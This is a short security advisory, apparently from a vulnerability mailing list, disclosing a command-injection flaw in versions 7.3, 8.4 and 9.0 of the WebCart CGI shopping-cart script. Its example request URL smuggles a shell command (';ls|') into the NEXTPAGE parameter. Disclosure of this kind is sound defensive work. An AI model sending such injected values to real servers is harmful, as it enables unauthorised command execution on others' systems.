|
|
| |
| Since 1994, the WebCart system has been one of the first and most popular E-commerce systems on the Internet. A security vulnerability in the product allows attackers to cause the product to execute arbitrary commands. |
| |
Credit:
The information has been provided by XAK.
|
| |
Vulnerable systems:
WebCart version 7.3
WebCart version 8.4
WebCart version 9.0
Example:
http://www.example.com/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
(Changing the NEXTPAGE value to ;ls| on any valid request would yield the same results)
|
|
|
|
|
|
|
|